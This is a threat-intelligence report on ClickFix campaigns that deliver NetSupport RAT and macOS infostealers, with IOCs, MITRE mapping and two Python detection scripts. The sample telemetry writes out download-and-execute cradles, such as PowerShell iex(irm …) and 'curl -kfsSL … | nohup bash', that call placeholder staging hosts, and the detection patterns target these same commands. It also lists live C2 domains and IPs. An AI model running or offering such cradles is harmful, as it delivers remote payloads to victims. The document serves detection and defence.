
ClickFix Campaigns Targeting Windows and macOS

Insikt Group identified five distinct threat clusters utilizing the ClickFix social engineering technique to trick users into manually executing malicious commands via native system tools. This living-off-the-land approach bypasses traditional browser security to deliver payloads like NetSupport RAT and macOS infostealers across both Windows and macOS environments.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-03-25 | reports

Authors: Insikt Group, Recorded Future

Actors: APT28, PurpleBravo, ClickFix, NetSupport RAT, Lumma Stealer, RedLine Stealer, MacSync, Odyssey Stealer

Source:Recorded Future

IOCs · 4
  • domain: alababababa[.]cloud - Payload delivery domain used in Cluster 3 (Birdeye) to distribute various malware strains.
  • domain: gologpoint[.]com - Command-and-Control (C2) domain for NetSupport RAT delivered in Cluster 1.
  • domain: nobovcs[.]com - Staging domain used in Cluster 1 (Intuit QuickBooks) to host malicious PowerShell scripts and payloads.
  • domain: octopox[.]com - Command-and-Control (C2) domain for macOS infostealers in Cluster 4.

Key Takeaways

  • The ClickFix methodology uses fake human-verification or system update prompts to trick users into manually executing malicious commands.
  • Five distinct clusters were identified targeting both Windows and macOS, impersonating brands like Intuit QuickBooks, Booking.com, and Birdeye.
  • The attack chain heavily relies on LOLBins (PowerShell, Windows Run dialog, macOS Terminal) to execute payloads in-memory, bypassing traditional browser security.
  • Payloads delivered include NetSupport RAT, Lumma Stealer, RedLine Stealer, MacSync, and Odyssey Stealer.
  • ClickFix has transitioned into a standardized, high-ROI template used by both cybercriminals and APT groups like APT28 (BlueDelta) and PurpleBravo.

Affected Systems

  • Windows
  • macOS

Attack Chain

Victims are lured to a compromised or malicious website presenting a fake human-verification or system update prompt. The site copies an obfuscated command to the victim's clipboard and instructs them to execute it via the Windows Run dialog or macOS Terminal. Once executed, LOLBins like PowerShell or curl download a secondary stager from a remote server. This stager executes in-memory, downloading and launching the final payload (such as NetSupport RAT or MacSync) while establishing persistence via Startup folder shortcuts.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide explicit detection rules but outlines behavioral patterns, command line fragments, and network IOCs for hunting.

Detection Engineering Assessment

  • EDR Visibility: High — EDR solutions can effectively monitor process creation events, specifically the execution of PowerShell or curl with suspicious arguments, and the creation of files in the Startup folder.
  • Network Visibility: Medium — While C2 traffic can be detected, initial staging often uses HTTPS and Cloudflare, obscuring the payload delivery. However, NetSupport RAT C2 traffic patterns may be identifiable.
  • Detection Difficulty: Moderate — The reliance on user interaction and LOLBins makes initial detection challenging, but the subsequent execution patterns (e.g., iex(irm...) or curl -kfsSL) are well-known and highly detectable.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • PowerShell Script Block Logging (Event ID 4104)
  • File Creation (Sysmon Event ID 11)

Hunting Hypotheses

  • Hypothesis: Look for PowerShell executions containing combinations of Invoke-RestMethod (irm) and Invoke-Expression (iex), especially with randomized casing or shortened aliases. | Telemetry: Process Creation, PowerShell Script Block Logging | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Monitor for macOS Terminal executions utilizing xxd -r -p piped to base64 and zsh or bash. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Detect the creation of .lnk files in the Windows Startup folder by scripts or unusual processes. | Telemetry: File Creation | ATT&CK Stage: Persistence | FP Risk: Medium
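The three hunting hypotheses above, together with the behavioral indicators the assessment calls out (iex/irm cradles with case swizzling, the xxd/base64/zsh decode chain, curl -kfsSL with nohup backgrounding, and .lnk drops in the Startup folder), can be expressed as a small rule set and run over endpoint telemetry. The following is an added example, not code from the Insikt Group report: the events are constructed to resemble Sysmon Event ID 1 (process creation) and Event ID 11 (file creation) records, the staging URLs and hostnames are placeholders, and the rule names, tags and the mixed-case heuristic are assumptions of this example. It generalizes the report's fragments slightly by also matching the long-form cmdlet names and pwsh.exe.

```python
"""Hunt the ClickFix execution patterns above over sample endpoint telemetry.

Added example, not code from the report: events are constructed to resemble
Sysmon Event ID 1 / Event ID 11 records; rule names and thresholds are assumed.
"""
import re
from typing import Dict, List, NamedTuple

PS_DIR = r"C:\Windows\System32\WindowsPowerShell\v1.0"
STAGING = "https://staging.example.invalid"  # constructed placeholder, not a report IOC
STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed sample events (hypothetical hosts, paths and URLs).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "host": "WIN-PC1", "parent": r"C:\Windows\explorer.exe",
     "image": PS_DIR + r"\powershell.exe",
     "cmd": f"powershell -wi mi -EP B -c iex(irm {STAGING}/a.txt)"},
    {"id": 1, "host": "WIN-PC1", "parent": r"C:\Windows\explorer.exe",
     "image": PS_DIR + r"\powershell.exe",
     "cmd": f'powershell.exe -wINDoW MiNI -c "IeX (iRm {STAGING}/b.txt)"'},
    {"id": 1, "host": "WIN-PC1", "parent": r"C:\Windows\System32\svchost.exe",   # benign admin script
     "image": PS_DIR + r"\powershell.exe",
     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": 1, "host": "MAC-01", "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/zsh",
     "cmd": "zsh -c 'echo 6563686f | xxd -r -p | base64 -D | zsh'"},
    {"id": 1, "host": "MAC-01", "parent": "/bin/zsh", "image": "/usr/bin/curl",
     "cmd": f"curl -kfsSL {STAGING}/p.sh | nohup bash &"},
    {"id": 1, "host": "MAC-01", "parent": "/bin/zsh", "image": "/usr/bin/curl",   # benign: no -k
     "cmd": "curl -fsSL https://packages.example.invalid/index.json"},
    {"id": 11, "host": "WIN-PC1", "image": PS_DIR + r"\powershell.exe",
     "target": STARTUP + r"\Helper.lnk"},
    {"id": 11, "host": "WIN-PC1", "image": r"C:\Windows\explorer.exe",   # benign: user-created shortcut
     "target": STARTUP + r"\Notes.lnk"},
]

IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I)
# Mixed-case "swizzling" such as -wINDoW MiNI: a word that starts lowercase but
# contains capitals, or a lowercase letter followed by a run of capitals (assumed heuristic).
SWIZZLE_RE = re.compile(r"^[a-z]+[A-Z]|[a-z][A-Z]{2}")
MAC_DECODE_RE = re.compile(r"xxd\s+-r\s+-p\s*\|\s*base64\s+-[dD]\b.*\|\s*(?:zsh|bash|sh)\b")
SHELL_PIPE_RE = re.compile(r"\|\s*(?:nohup\s+)?(?:zsh|bash|sh)\b")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


class Finding(NamedTuple):
    host: str
    rule: str
    stage: str
    fp_risk: str
    tags: List[str]


def basename(path: str) -> str:
    """Last path component, tolerant of both Windows and POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def curl_skips_tls_check(cmd: str) -> bool:
    """True when curl bundles -k (no TLS verification) with -s (silent) in one
    short-flag group before the first pipe, as in the report's curl -kfsSL."""
    m = re.search(r"\bcurl\b([^|]*)", cmd)
    if not m:
        return False
    for tok in m.group(1).split():
        if tok.startswith("-") and not tok.startswith("--") and {"k", "s"} <= set(tok[1:]):
            return True
    return False


def hunt(events: List[Dict[str, object]]) -> List[Finding]:
    """Apply the three hunting hypotheses to process- and file-creation events."""
    findings: List[Finding] = []
    for ev in events:
        exe = basename(str(ev.get("image", "")))
        host = str(ev["host"])
        if ev["id"] == 1:
            cmd = str(ev.get("cmd", ""))
            # H1: PowerShell download cradle (iex + irm), optionally case-swizzled
            if exe in {"powershell.exe", "pwsh.exe"} and IEX_RE.search(cmd) and FETCH_RE.search(cmd):
                tags = ["download-cradle"]
                if any(SWIZZLE_RE.search(w) for w in re.findall(r"[A-Za-z]+", cmd)):
                    tags.append("case-swizzling")
                findings.append(Finding(host, "ps_iex_irm", "Execution", "Low", tags))
            # H2: macOS hex -> base64 -> shell decode chain
            if MAC_DECODE_RE.search(cmd):
                findings.append(Finding(host, "macos_xxd_base64_shell", "Execution", "Low", ["decode-chain"]))
            # curl -kfsSL fetch, worse when piped to a shell and backgrounded with nohup/&
            if exe == "curl" and curl_skips_tls_check(cmd):
                tags = ["tls-verification-disabled"]
                if SHELL_PIPE_RE.search(cmd):
                    tags.append("piped-to-shell")
                if "nohup" in cmd and cmd.rstrip().endswith("&"):
                    tags.append("backgrounded")
                findings.append(Finding(host, "curl_insecure_download", "Execution", "Low", tags))
        elif ev["id"] == 11:
            # H3: .lnk written into the Startup folder by something other than Explorer
            target = str(ev.get("target", "")).lower()
            if STARTUP_DIR in target and target.endswith(".lnk") and exe != "explorer.exe":
                tag = "script-host-writer" if exe in SCRIPT_HOSTS else "unusual-writer"
                findings.append(Finding(host, "startup_lnk_creation", "Persistence", "Medium", [tag]))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.rule:24} {f.stage:12} FP={f.fp_risk:6} {', '.join(f.tags)}")
```

The benign events (a scheduled backup script launched with -ExecutionPolicy Bypass, a curl without -k, a shortcut created by Explorer) pass through untouched, which is the point of keying the PowerShell rule on the iex+irm pair rather than on execution-policy flags alone; the Startup rule still carries the report's Medium FP rating because software installers legitimately write .lnk files there.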

Control Gaps

  • Browser security controls (bypassed by manual execution)
  • Static AV signatures (bypassed by in-memory execution and obfuscation)

Key Behavioral Indicators

  • PowerShell command swizzling (e.g., -wINDoW MiNI)
  • macOS commands using nohup and & for background persistence
  • Use of 7z.exe to extract password-protected archives in %TEMP% or %LOCALAPPDATA%

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known ClickFix staging and C2 domains/IPs.
  • Hunt for NetSupport RAT and Odyssey Stealer IOCs on endpoints.

Infrastructure Hardening

  • Disable the Windows Run dialog (Win+R) via GPO.
  • Implement PowerShell Constrained Language Mode (CLM).
  • Use AppLocker or WDAC to restrict unsigned scripts.
  • Restrict macOS Terminal via MDM.

User Protection

  • Deploy EDR to monitor for suspicious LOLBin usage.

Security Awareness

  • Train users to recognize fake human-verification prompts and never paste commands into the Run dialog or Terminal.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1204.001 - User Execution: Malicious Link
  • T1027.010 - Obfuscated/Compressed Files or Information: Command Obfuscation
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1105 - Ingress Tool Transfer

Additional IOCs

  • IPs:
    • 62[.]164[.]177[.]230 - Resolves to gologpoint.com (Cluster 1 NetSupport C2).
    • 91[.]202[.]233[.]206 - IP address hosting multiple ClickFix domains for Cluster 2.
    • 77[.]91[.]65[.]144 - NetSupport RAT C2 IP address for Cluster 2.
    • 77[.]91[.]65[.]31 - NetSupport RAT C2 IP address for Cluster 2.
    • 45[.]135[.]232[.]33 - Staging IP address for Odyssey Stealer C2 (Cluster 4).
    • 217[.]119[.]139[.]117 - Staging IP address for Odyssey Stealer C2 (Cluster 4).
  • Domains:
    • thestayreserve[.]com - ClickFix domain for Cluster 2 (Booking.com).
    • checkpulses[.]com - Staging domain for Cluster 2.
    • sign-in-op-token[.]com - ClickFix domain for Cluster 2.
    • bkng-updt[.]com - Staging domain for Cluster 2.
    • hotelupdatesys[.]com - NetSupport RAT C2 domain for Cluster 2.
    • chrm-srv[.]com - NetSupport RAT C2 domain for Cluster 2.
    • ms-scedg[.]com - NetSupport RAT C2 domain for Cluster 2.
    • joeyapple[.]com - macOS C2 domain for Cluster 4.
    • mac-os-helper[.]com - ClickFix domain for Cluster 5 (macOS Storage Cleaning).
    • macosapp-apple[.]com - ClickFix domain for Cluster 4.
    • quicrob[.]com - Staging domain for Cluster 1.
    • robovcs[.]com - Staging domain for Cluster 1.
  • URLs:
    • hxxps://alababababa[.]cloud/cVGvQio6.txt - Payload download URL for Cluster 3.
  • File Hashes:
    • c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50 (SHA256) - at.7z archive containing NetSupport RAT binary (Cluster 1).
    • 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db (SHA256) - lnk.7z archive containing persistence shortcut.
    • 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 (SHA256) - 7z.exe utility used for extraction.
    • b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c (SHA256) - 7z.dll utility library.
    • 397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 (SHA256) - at.7z archive containing NetSupport RAT binary (Cluster 2).
    • 2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37 (SHA256) - Odyssey Stealer payload hash (Cluster 4).
  • File Paths:
    • %TEMP%\script.ps1 - Location where the initial PowerShell stager is saved.
    • %LOCALAPPDATA%\[Randomized_Romantic_Name] - Directory created by the stager to hide NetSupport RAT artifacts.
  • Command Lines:
    • Purpose: Download and execute remote payload in memory via PowerShell | Tools: powershell.exe | Stage: Execution | powershell.exe -wINDoW MiNI
    • Purpose: Bypass execution policy and download payload via PowerShell | Tools: powershell.exe | Stage: Execution | powershell -wi mi -EP B -c iex(irm
    • Purpose: Download payload silently on macOS bypassing TLS checks | Tools: curl | Stage: Execution | curl -kfsSL
    • Purpose: Decode and execute obfuscated macOS payload | Tools: xxd, base64, zsh | Stage: Execution | xxd -r -p | base64 -D | zsh
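The immediate mitigations above (block the known staging and C2 domains and IPs, hunt for the IOCs) start with a sweep of DNS, proxy and flow logs against the network IOCs listed in this report. The following is an added example, not code from the report: the IOC values are quoted from the IOC lists above in their published defanged form (a subset, to keep the block short), while the log lines, hostnames, timestamps and the key=value log layout are constructed. It matches subdomains of a listed domain and URLs whose host is a listed domain, and deliberately does not match a lookalike such as gologpoint.com.example.org.

```python
"""Sweep DNS, proxy and flow logs for the network IOCs this report lists.

Added example, not code from the report: the IOC values are quoted from the
report's IOC lists in their published defanged form; the log lines, hostnames,
timestamps and log layout are constructed.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple
from urllib.parse import urlsplit

REPORT_IOCS: Dict[str, Dict[str, str]] = {
    "domain": {
        "alababababa[.]cloud": "Cluster 3 payload delivery domain",
        "gologpoint[.]com": "Cluster 1 NetSupport RAT C2",
        "nobovcs[.]com": "Cluster 1 staging domain",
        "octopox[.]com": "Cluster 4 macOS infostealer C2",
        "hotelupdatesys[.]com": "Cluster 2 NetSupport RAT C2",
    },
    "ip": {
        "62[.]164[.]177[.]230": "Cluster 1 NetSupport RAT C2 (gologpoint.com)",
        "77[.]91[.]65[.]144": "Cluster 2 NetSupport RAT C2",
        "45[.]135[.]232[.]33": "Cluster 4 Odyssey Stealer staging",
    },
    "url": {"hxxps://alababababa[.]cloud/cVGvQio6.txt": "Cluster 3 payload download URL"},
}


def refang(ioc: str) -> str:
    """Undo the defanging used in published IOC lists so values compare to live logs."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


DOMAINS = {refang(d).lower(): why for d, why in REPORT_IOCS["domain"].items()}
IPS = {refang(i): why for i, why in REPORT_IOCS["ip"].items()}
URLS = {refang(u): why for u, why in REPORT_IOCS["url"].items()}


class Hit(NamedTuple):
    line_no: int
    host: str
    field: str
    value: str
    ioc: str
    context: str


def match_domain(name: str) -> Optional[str]:
    """Exact or subdomain match; 'gologpoint.com.example.org' must NOT match."""
    name = name.lower().rstrip(".")
    for d in DOMAINS:
        if name == d or name.endswith("." + d):
            return d
    return None


def classify(value: str) -> Optional[Tuple[str, str]]:
    """Map one log field value (IP, hostname or URL) to a report IOC, if any."""
    if value in IPS:
        return value, IPS[value]
    if value in URLS:
        return value, URLS[value]
    if "://" in value:  # URL whose host is a listed domain
        d = match_domain(urlsplit(value).hostname or "")
        return (d, DOMAINS[d]) if d else None
    d = match_domain(value)
    return (d, DOMAINS[d]) if d else None


KV_RE = re.compile(r"(\w+)=(\S+)")


def sweep(lines: List[str]) -> List[Hit]:
    """Each line: '<timestamp> <host> <source> key=value ...' (constructed layout)."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue
        for field, value in KV_RE.findall(parts[3]):
            m = classify(value)
            if m:
                hits.append(Hit(n, parts[1], field, value, m[0], m[1]))
    return hits


# Constructed sample log lines (hypothetical hosts; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, not report IOCs).
SAMPLE_LOG_LINES = [
    "2026-03-25T09:12:01Z WIN-PC1 dns query=gologpoint.com type=A answer=62.164.177.230",
    "2026-03-25T09:12:05Z WIN-PC1 proxy method=GET url=https://alababababa.cloud/cVGvQio6.txt status=200",
    "2026-03-25T09:13:40Z MAC-01 dns query=cdn.octopox.com type=A answer=203.0.113.7",
    "2026-03-25T09:14:02Z MAC-01 flow proto=tcp dst=45.135.232.33 dport=443",
    "2026-03-25T09:15:00Z WIN-PC2 proxy method=GET url=https://www.example.com/ status=200",
    "2026-03-25T09:16:00Z WIN-PC2 dns query=gologpoint.com.example.org type=A answer=198.51.100.5",
]

if __name__ == "__main__":
    for h in sweep(SAMPLE_LOG_LINES):
        print(f"line {h.line_no}: {h.host} {h.field}={h.value} -> {h.ioc} ({h.context})")
```

The first line produces two hits, one for the query name and one for the resolved address, which is the pairing the report describes (62[.]164[.]177[.]230 resolving to gologpoint.com); checking both fields means the sweep still fires when the victim resolved the C2 name through a resolver the log does not see but the flow log records the address.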